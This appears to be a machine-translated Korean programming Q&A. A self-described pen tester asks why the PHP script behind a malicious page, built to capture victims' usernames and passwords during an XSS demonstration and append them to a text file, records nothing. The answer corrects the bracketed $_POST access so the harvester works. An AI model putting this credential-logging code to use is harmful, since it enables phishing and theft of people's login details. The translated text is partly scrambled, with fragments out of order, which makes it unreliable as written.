0
저는 (중학교) 펜 테스터로 클라이언트에 대한 XSS 공격의 위험성을 보여주는 스크립트를 만들려고합니다. 나는 사용자를 기록하기위한 PHP 스크립트를 가지고있다. 희생자 (즉, 데모에서의 나 자신)가 내가 호스팅하는 악의적 인 페이지로 리디렉션 될 때 콤보를 패스한다.게시 된 데이터 변수가 PHP 스크립트에 저장되지 않습니다
<input type="text" id="form_login_username" name="form[login][username]" value="" class="large" />
<input type="password" id="form_login_password" name="form[login][password]" value="" class="large" />
내가 그렇게 PHP로 새로 온 사람이의 문제를 야기 정말 기본 일 수 있습니다 :
이
는 로그인에 대한 소스의 일부입니다. 내가 얻을이 스크립트<?PHP
$filename = "login_details.txt";
$username = $_POST["form[login][username]"];
$password = $_POST["form[login][password]"];
$fh = fopen($filename, "aw") or die("cannot open file");
fwrite($fh, $username . ":" . $password . "\r\n");
fclose($fh);
:
Notice: Undefined index: form[login][username] in...
그리고 암호 같은 여기 내 PHP는 세부 사항을 기록하는 스크립트입니다.
변수가 설정 중인지 확인하기 위해 내가 추가했습니다.
다른 간단한 로그인 페이지를 사용해 보았는데 완벽하게 작동 했으므로 스크립트가 작동한다는 것을 알고 있습니다. 유일한 차이점은이 경우 사용자 이름과 비밀번호 게시 변수에 대괄호가 포함되어 있다는 것입니다. 이것이 문제 일 수 있습니까? 내가 그들을 인코딩 URL을 시도했지만 아무 소용 :(에
내가 잘못 갈거야 어떤 아이디어? 당신의 변수에 액세스 할 수있는 유효한 방법은 그냥
$_POST['form']['login']['username']
때문에
빙고! 나는 그것이 바보 같았다는 것을 알았습니다 =) - 많은 zerkms에게 감사드립니다! – Jingo